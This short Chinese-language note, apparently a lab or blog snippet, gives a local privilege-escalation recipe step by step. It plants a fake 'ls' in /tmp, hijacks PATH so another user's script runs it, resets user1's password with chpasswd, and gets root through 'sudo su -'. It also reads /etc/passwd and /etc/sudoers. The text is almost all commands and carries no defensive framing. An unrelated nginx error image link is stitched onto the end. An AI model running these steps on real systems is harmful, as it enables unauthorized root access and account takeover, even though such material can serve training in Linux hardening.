利用SUDO实现提权
利用用户的sudo授权获得root的shell
cat /etc/passwd
cat /etc/sudoers 命令没有权限
echo "cat /etc/sudoers" >/tmp/ls
chmod 755 /tmp/ls
export PATH=/tmp:$PATH
/home/user5/script
想办法更改user1的口令
echo 'echo "user1:xiaoxiao" | chpasswd ' >/tmp/ls
调用user5的脚本:/home/user5/script
su - user1切换user1用户 密码则为设置的xiaoxiao:
后直接提权到root用户:sudo su -
![解决启动服务报./nginx -s reload nginx: [emerg] unknown directive “错误](https://img-blog.csdnimg.cn/direct/de251f151cf94132b8d6240b9031fa30.png)
